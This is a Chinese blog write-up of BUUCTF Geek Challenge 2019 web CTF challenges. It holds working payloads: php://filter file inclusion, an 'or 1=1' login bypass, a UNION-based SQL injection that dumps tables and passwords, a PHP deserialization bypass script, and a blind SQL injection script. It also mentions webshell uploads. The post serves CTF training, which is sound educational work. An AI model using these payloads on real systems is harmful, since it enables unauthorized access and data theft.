BUUCTF web 极客大挑战 2019

最新推荐文章于 2024-04-25 00:27:16 发布
最新推荐文章于 2024-04-25 00:27:16 发布
阅读量1.7k 收藏 2
点赞数 2
分类专栏: ctf_web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qinying001/article/details/105257247
版权

Secret File

 在源码之中得到一个php页面
在这里插入图片描述
 后面页面之中
在这里插入图片描述
在这里插入图片描述
 根据提示抓包,在其中返回的页面得到了信息
在这里插入图片描述
 得到源码,根据源码,发现存在文件包含漏洞
在这里插入图片描述
 利用php伪协议,获取flag.php的信息,拿取flag
payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

Havefun

源码中发现代码
在这里插入图片描述
构造输入,获取flag
在这里插入图片描述

EasySQL

 利用万能密码,直接得到flag

admin' or 1=1#

Upload

能上传phtml类型文件
不能包含<?在这里插入图片描述
所以使用javascript中的语法,调用php,实现一句话木马
在这里插入图片描述
利用蚁剑连接,拿到flag
在这里插入图片描述

PHP

在这里插入图片描述
 经过测试,找到了www.zip这个备份文件。
在这里插入图片描述
 index.php中找到了一个反序列化的php函数:
在这里插入图片描述
 class.php里面存在一个类:
在这里插入图片描述
 根据类里面的信息,需要绕过__wakeup()获取flag,具体可以更改序列化后类属性的字段,大于本身的字段就可以绕过。
 私有属性反序列化之后,其属性名前面需要加\0。
payload:

import requests
s = 'O:4:"Name":3:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}'
url = 'http://32eeec15-b10b-477f-9dc9-3d492ae6c7df.node3.buuoj.cn/?select='
r = requests.get(url+s)
r.text

Knife

 菜刀连接,在根目录找到flag

LoveSQL

在这里插入图片描述
 首先尝试万能密码admin’ or 1=1#,成功登录进去
在这里插入图片描述
 尝试在username注入:

// order by 注入查看字段,检查出字段为3
?username=admin%27+order+by+4%23&password=123

//联合注入,查找数据库
?username=admin1%27+union+select+1,2,group_concat(schema_name)+from+information_schema.schemata%23&password=123
//information_schema,test,performance_schema,mysql,geek,geek是当前数据库

//搜索geek数据库的表名
?username=admin1%27+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema='geek'%23&password=123
//geekuser,l0ve1ysq1

//查询表l0ve1ysq1
?username=admin1%27+union+select+1,2,group_concat(column_name)+from+information_schema.columns+where+table_schema='geek'+and+table_name='l0ve1ysq1'%23&password=123
//id,username,password

//查询password字段,得到flag
?username=admin1%27+union+select+1,2,group_concat(password)+from+l0ve1ysq1%23&password=123

Http

在这里插入图片描述
页面提示,访问Secret.php,首字母记得大写。。。
在这里插入图片描述
上burp,加Rerferer
在这里插入图片描述
改UA
在这里插入图片描述
加XFF
在这里插入图片描述
拿到flag

FinalSQL

在这里插入图片描述

sql盲注,但是注入点被隐藏了,可以在源码中找到
在这里插入图片描述
更改源码并输入选择后,跳转到了search.php界面,并且是get传参,之后,检查过滤字符,初步检查过滤了空格,还有内联注释,不能直接内联注释绕过了,改用括号代替空格,最后脚本:
ps: 二分法还是快很多的,延迟也加上,没加延时收到很多错误数据,自己电脑太差了😭

import requests
import sys
import time

url = "http://66bb3fde-091a-402c-9d3e-828369716f57.node3.buuoj.cn/search.php?id=1^"

s = ''
for i in range(1,1000):
    left = 30
    right = 130
    while left != right:
        time.sleep(0.1)
        mid = (left+right)//2
        #url1 = url+"(ascii((substr((select(database())),%d,1)))>%d)" % (i, mid) # 获取数据库
        # 获取表名
        #url1 = url+"(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)" % (i, mid)
        # 获取列名
        #url1 = url+"(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='Flaaaaag'),%d,1))>%d)" % (i, mid)
        # 读取数据
        url1 = url+"(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" % (i, mid)
        #print(url1)
        r = requests.get(url1)
        if "ERROR" in r.text:
            left = mid+1
        else:
            right = mid
    if left == 30:
        break
    else:
        s += chr(left)
        print(s)
print(s)
个人微信公众号,喜欢的话,随手关注一下啦

在这里插入图片描述

影子019
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF学习(四): 文件包含tips
初尘屿风的博客
10-16 556
-
CTF | 关于web的小伎俩
qq_42646885的博客
07-06 1500
打开服务器上的网页然后看到进入第一关的按钮,点击。 点击按钮,跳转到下一个页面。 查看源代码,看到有一行的注释:删除1.php.bak 在地址栏加上1.php.bak后,页面变化不大,多了几个符号。 再次查看源代码: 注释中给了第二关的地址,在地址栏访问: 点击“点击进入第三关”的按钮: 看到一个弹窗,以及第三关的页面是3rd.php,点击确定返回之前第二...
BUUCTF】[极客挑战 2019] PHP 清晰易懂详细总结 Writeup
algae
08-26 1951
BUUCTF】[极客挑战 2019] PHP Writeup0x00 考点目录扫描源码泄露反序列化0x01 解题 0x00 考点 目录扫描 源码泄露 反序列化 0x01 解题 dirsearch -u 指定url -e 指定网站语言 -w 可以加上自己的字典(加上路径) -r 递归跑(查到一个目录后,在目录后重复跑,很慢,不建议用) python3 dirsearch.py -u http://26e0c1d7-d98e-4a34-9ffe-901887297fb5.node3.buuoj.cn
BUUCTF---misc---黑客帝国
最新发布
2201_75556700的博客
04-25 252
5、放在winhex中查看图片,将损坏的图片和一张正常的图片进行对比,会发现他们的文件头不太一样。4、尝试打开文件,发现需要密码,用工具破解密码,得到压缩包里面的图片,但是图片损坏了。1、题目描述,下载附件,附件是一个txt文本。文本开头的是个rar文件的头标识。6、将损坏图片头改为jpg格式:FFD8FFE0,保存。2、将文本转换为16进制格式,并输出为rar文件。3、之后会在相应的路径下看到.rar文件。hex_data='这里写文本数据'8、双击图片,可以看到flag。7、便可以看到修改好的图片。
文件包含总结
weixin_63289925的博客
03-23 2760
文件包含漏洞:通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入, 类型一:php伪协议(php://filter语句) php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 ...
Buuctf_Include【文件包含——伪类】
qq_61968245的博客
12-17 628
0x01 题目链接 BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Include 0x02
BUUCTF——Basic题解
Zichel77的博客
08-17 5584
所以我们不能将input设为具体的值,而是在序列化执行,令input=&correct。文件包含在 php 中,涉及到的危险函数有四个,分别是 include()、include_once()、require()、require_once()。程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程一般被称为文件包含。于是涉及到了md5绕过的问题,md5这个地方可以用md5弱碰撞,因为是弱类型比较。以下几个的md5弱类型比较均相等。...
BUUCTF-Web-[极客挑战 2019]Upload
weixin_67813445的博客
04-29 927
,所以考虑修改为JS风格的代码标记,修改完之后发送,页面如下图所示,Don’t lie to me,it’s not image at all!用burpsuite进行抓包,修改MIME类型, 即将Content-Type修改为image/jpeg,修改之后页面如下图所示,显示NOT!将文件后缀名改为php的其他扩展名,页面如下图所示,检测文件内容中包含了’<?上传一个php文件,此处上传shell.php后页面如下图所示,显示不是图片。将文件后缀改为jpg,页面如下图所示,文件类型符合要求,但。
极客web前端
07-22
教程名称:极客web前端教程目录:【】1、走进前端工程师的世界【】2、HTML5【】3、CSS3【】4、Javascript【】5、常?的库之 jQuery【】6、常?的库之 jQuery UI【】7、常?的库之 jQuery Mobile【】8、常用的库之...
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
极客学院web前端开发学习教程
05-25
包含bootstrap、html5、php、web前端开发,百度网盘地址
Web3极客日报 #12
01-08
基于Web3,Solidity,Truffle的一个完整的售卖和购买的简单Dapp demo。 如何在以太坊上构建TodoList – 教程@Riverhttps://www.dappuniversity.com/articles/blockchain-app-tutorial 基于Web3,Solidity,Truffle等...
Web3极客日报 #6
01-08
如何理解Rust中的可变与不可变? ...@洋芋:本文介绍了Rust标准库中的Cell, RefCell,其作为提供内部可变性的容器,弥补了Rust所有权机制在灵活性上和某些场景下的不足。 学习Polkadot的好地方:Polkadot Wiki ...
BUUCTF-[极客挑战 2019]PHP
rumil的博客
06-29 210
通过第二个if控制语句,我们发现通过正则表达式过滤掉了flag,所有说file参数传入时,如果有flag出现就会被过滤掉,我们再根据下一句话,文件包含,我们尝试去获取useless.php 的源码,看是什么信息,再次构造payload。发现是网页的源码,经过分析可得,三个参数分别为text,file,password通过get方式进行传参,在if控制语句当中,设置text变量,并在文件当中读取数据,要等于welcome to the zjctf才会返回true。:私有的类成员则只能被其定义所在的类访问。
BUUCTF [极客挑战 2019]Upload
m0_49025459的博客
05-12 4922
这题目是文件上传漏洞 看到这种上传的漏洞,肯定就是上传一句话木马,我们写一个正常的一句话木马先上传试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上传之后,提示我们不是image格式,那么我们上传的时候就抓一下包,修改一下上传的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
【网络安全 | CTFCTF极客挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 4619
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
BUUCTF——[极客挑战 2019]PHP
doraemon12345的博客
06-07 292
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
BUUCTFWeb】Include(文件包含伪协议)
qq_70434663的博客
03-01 567
进入靶场后习惯的右键查看源码但什么都没有发现,点击“tips”后得到“can you find out the flag?”内容源码也没有什么内容。其实题目已经提示了“include”文件包含漏洞(伪协议)。最后在进行base64解码就可以得到flag了。对于文件包含漏洞大家可以看。
BUUCTF-PHP
z1moq的博客
09-07 1004
启动靶机,打开网页发现有提示说存在备份文件 直接使用 www.zip 下载备份源码 在 index.php 中发现反序列化函数 此文件包含了 class.php 所以继续前往该文件进行审查 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __con
buuctf web 极客挑战2019
08-24
嗨!对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计和网络协议等。参赛者需要通过解决各个题目来获取相应的flag,以证明自己的能力。如果你有具体的问题或需要更详细的信息,我会尽力帮助你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值